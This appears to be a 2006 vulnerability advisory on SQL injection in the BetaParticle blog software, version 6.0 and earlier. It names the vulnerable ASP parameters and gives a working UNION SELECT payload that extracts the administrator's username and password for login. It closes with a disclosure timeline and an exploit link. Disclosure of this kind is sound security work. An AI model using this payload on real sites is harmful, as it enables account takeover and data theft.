Vendor: BetaParticle (http://www.betaparticle.com/)
Version: 6.0 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL query.
Level: Critical
How&Example:
GET -> http://[site]/bpdir/template_permalink.asp?id=[SQLQuery]
GET -> http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery]
Example ->
http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SELECT+null,fldAuthorUsername
,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1
With this example remote attacker could get admin's pass and can login from
/main.asp
Timeline:
18/03/2006: Vulnerability found.
18/03/2006: Contacted with vendor and waiting reply.
Exploit:
Click here and get exploit for this advisory